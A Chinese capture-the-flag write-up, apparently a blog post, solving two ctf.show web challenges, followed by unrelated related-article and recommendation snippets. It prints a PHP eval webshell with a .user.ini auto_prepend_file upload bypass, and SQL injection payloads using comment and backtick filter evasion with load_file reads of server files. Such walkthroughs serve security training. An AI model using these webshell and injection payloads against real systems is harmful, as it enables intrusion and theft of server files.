web13

题目显示文件上传,各类型上传均提示错误,在使用ctf-scan扫描的时候,发现upload.php.bak

查看源码:

<?php

	header("content-type:text/html;charset=utf-8");

	$filename = $_FILES['file']['name'];

	$temp_name = $_FILES['file']['tmp_name'];

	$size = $_FILES['file']['size'];

	$error = $_FILES['file']['error'];

	$arr = pathinfo($filename);

	$ext_suffix = $arr['extension'];

	if ($size > 24){

		die("error file zise");

	}

	if (strlen($filename)>9){

		die("error file name");

	}

	if(strlen($ext_suffix)>3){

		die("error suffix");

	}

	if(preg_match("/php/i",$ext_suffix)){

		die("error suffix");

    }

    if(preg_match("/php/i"),$filename)){

        die("error file name");

    }

	if (move_uploaded_file($temp_name, './'.$filename)){

		echo "文件上传成功!";

	}else{

		echo "文件上传失败!";

	}

 ?>

阅读源码,上传限制:

  1. 文件大小小于等于24
  2. 文件名长度小于等于9
  3. 后缀长度小于等于3
  4. 文件名和后缀名均不能存在php

可以将<?php eval($_POST['a']);写入1.txt文件,但是由于后缀问题服务器无法解析该php语句。

  1. 上传1.txt
  2. 上传.user.ini文件
  3. 菜刀连接

PHP 会在每个目录下搜寻的文件名;如果设定为空字符串则 PHP 不会搜寻。也就是在.user.ini中如果设置了文件名,那么任意一个页面都会将该文件中的内容包含进去。

我们在.user.ini中输入auto_prepend_file =1.txt,这样在该目录下的所有文件都会包含1.txt的内容。

菜刀连接上之后发现没有权限,只能尝试在网页上访问。

<?php eval($_GET['a']);写入1.txt文件,上传。

使用payload:?a=print_r(glob('*'));

Array (

    [0] => 903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php

    [1] => a.txt

    [2] => index.php

    [3] => upload.php

    [4] => upload.php.bak

)

使用highlight查看文件。

?a=highlight_file("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php");

得到flag。

web14

<?php

include("secret.php");

if(isset($_GET['c'])){

    $c = intval($_GET['c']);

    sleep($c);

    switch ($c) {

        case 1:

            echo '$url';

            break;

        case 2:

            echo '@A@';

            break;

        case 555555:

            echo $url;

        case 44444:

            echo "@A@";

            break;

        case 3333:

            echo $url;

            break;

        case 222:

            echo '@A@';

            break;

        case 222:

            echo '@A@';

            break;

        case 3333:

            echo $url;

            break;

        case 44444:

            echo '@A@';

        case 555555:

            echo $url;

            break;

        case 3:

            echo '@A@';

        case 6000000:

            echo "$url";

        case 1:

            echo '@A@';

            break;

    }

}

highlight_file(__FILE__);

switch case语句中如果某一项没有break语句,就有可能出现非预期的结果。

这里构造payload:?c=3,就可以获得想要的结果:

@A@here_1s_your_f1ag.php@A@

第二个网页是一个查询页面,可能是sql注入。先查看源代码,发现提示:

<!--

	if(preg_match('/information_schema\.tables|information_schema\.columns|linestring| |polygon/is', $_GET['query'])){

		die('@A@');

	}

-->

过滤了information_schema.tablesinformation_schema.columnslinestring 空格polygon

可以使用反引号绕过部分过滤:

information_schema.tables

information_schema.`tables`

这两句话等价

查询过程:

数据库名: ?query=-1/**/union/**/select/**/database()

OUTPUT: web


表名: ?query=-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema=database()

OUTPUT: content


列名: ?query=-1/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_name='content'

OUTPUT: id,username,password


值: ?query=-1/**/union/**/select/**/concat_ws(0x24,id,username,password)/**/from/**/content/**/where/**/id=1

OUTPUT:

1$admin$flag is not here!

2$gtf1y$wow,you can really dance

3$Wow$tell you a secret,secret has a secret...

没有flag,通过第三条数据,猜测flag在secret.php中,使用load_file()读取本地文件:

?query=-1/**/union/**/select/**/load_file('/var/www/html/secret.php')

获得信息:

<script>

alert('<!-- ReadMe -->

<?php

$url = 'here_1s_your_f1ag.php';

$file = '/tmp/gtf1y';

if(trim(@file_get_contents($file)) === 'ctf.show'){

	echo file_get_contents('/real_flag_is_here');

}')</script>

读取真实flag:

?query=-1/**/union/**/select/**/load_file('/real_flag_is_here')

获得flag。

CTF_show平台 web题解 part3的更多相关文章

  1. CTF_show平台 web题解 part2

    web10 WITH ROLLUP 绕过 点击取消键弹出源码下载: 源码如下: <?php $flag=""; function replaceSpecialChar($st ...

  2. CTF_show平台 web题解 part1

    web3 题目描述: 方法一:RFI 使用url实现php远程文件包含 在服务器上构造1.txt <?php $a = "<?php eval(\$_POST['123'])?& ...

  3. ctfshow 1024杯 部分web题解

    ------------恢复内容开始------------ 今年1024忙得厉害,去大上海参加geekpwn膜拜大佬,几家平台的题目没怎么好好看.特别是小破站的比赛拉跨的一批,bytectf的web ...

  4. 自制公众平台Web Api(微信)

    最近一段时间感觉没什么东西可以分享给大家,又由于手上项目比较赶,不太更新博客了,今天趁着生病闲下来的时间分享一些项目中的东西给大家. 公众平台 提起公众平台当下最流行的莫过于腾讯的微信了,当然还有易信 ...

  5. 开放平台-web实现人人网第三方登录

    应用场景     web应用通过人人网登录授权实现第三方登录.   操作步骤     1  注册成为人人网开放平台开发者         http://app.renren.com/developer ...

  6. 开放平台-web实现QQ第三方登录

    应用场景     web应用通过QQ登录授权实现第三方登录.   操作步骤     1  注册成为QQ互联平台开发者,http://connect.qq.com/     2  准备一个可访问的域名, ...

  7. 移动平台WEB前端开发技巧汇总

    原文 :http://uecss.com/mobile-platform-web-front-end-development-skills-summary.html 开发者们都知道在高端智能手机系统中 ...

  8. 移动平台WEB前端开发技巧

    1.首先我们来看看webkit内核中的一些私有的meta标签,这些meta标签在开发webapp时起到非常重要的作用 <meta content="width=device-width ...

  9. 移动平台WEB前端开发技巧汇总(转)

    最近我很关注移动前端的知识,但做为一个UI设计师和web前端工作人员没有这个工作环境接触,做为门外汉,网上系统的知识也了了,一直有种雾里看花的感觉,见到本文,我自己是奉为经典.所以我分享之后又专门打笔 ...

随机推荐

  1. 如何向这些CA来申请数字证书呢?

    申请的过程大致是: 1.自己本地先生成一对密匙,然后拿着自己的公匙以及其他信息(比如说企业名称啊什么的)去CA申请数字证书. 2.CA在拿到这些信息后,会选择一种单向Hash算法(比如说常见的MD5) ...

  2. uni-app热更新

    开发工具HbuilderX开发框架 uni-app.h5+1.生成 App 资源升级包1.1.修改版本号1.2.首先,更新 manifest.json 中的版本号.比如之前是 1.0.0,那么新版本应 ...

  3. Redis学习笔记(二十一) 事务

    文章开始啰嗦两句,写到这里共21篇关于redis的琐碎知识,没有过多的写编程过程中redis的应用,着重写的是redis命令.客户端.服务器以及生产环境搭建用到的主从.哨兵.集群实现原理,如果你真的能 ...

  4. 青蛙的约会 (ax+by=c求最小整数解)【拓展欧几里得】

                                                  青蛙的约会(点击跳转) 两只青蛙在网上相识了,它们聊得很开心,于是觉得很有必要见一面.它们很高兴地发现它们住 ...

  5. jmeter录制app测试脚本

    1.jmeter 下载地址 https://jmeter.apache.org 2.选择下载包 3.下载完成后解压即可使用(也可以配置环境变量,但我一般不配置,可以使用) 4.打开jmeter 创建线 ...

  6. Excel随机生成批量日期,以及注意事项

    这个是WPS里写的一个函数,用来随机生成日期.首先E1和E2是两个日期端点,右键把单元格格式先设置成“日期”中的“xxxx年xx月xx日 xx:xx”,然后E3=E1-E2算出它们的距离. 在E4里面 ...

  7. PDO的事务处理 事务回滚

    <?phpheader('content-type:text/html;charset=utf-8');include 'PdoClass.php';$objPdo=new PdoClass() ...

  8. 08.DRF-反序列化

    三.反序列化使用 3.1 验证 使用序列化器进行反序列化时,需要对数据进行验证后,才能获取验证成功的数据或保存成模型类对象. 在获取反序列化的数据前,必须调用is_valid()方法进行验证,验证成功 ...

  9. CPU明明8个核,网卡为啥拼命折腾一号核?

    中断机制 我是CPU一号车间的阿Q,我又来了! 我们日常的工作就是不断执行代码指令,不过这看似简单的工作背后其实也并不轻松. 咱不能闷着头啥也不管一个劲的只管执行代码,还得和连接在主板上的其他单位打交 ...

  10. 黎活明8天快速掌握android视频教程--15_采用Pull解析器解析和生成XML内容

    1.该项目主要有下面的两个作用 (1)将xml文件解析成对象的List对象,xml文件可以来自手机本地,也可以来自服务器返回的xml数据 (2)强list对象保存成xml文件,xml保存到手机的内存卡 ...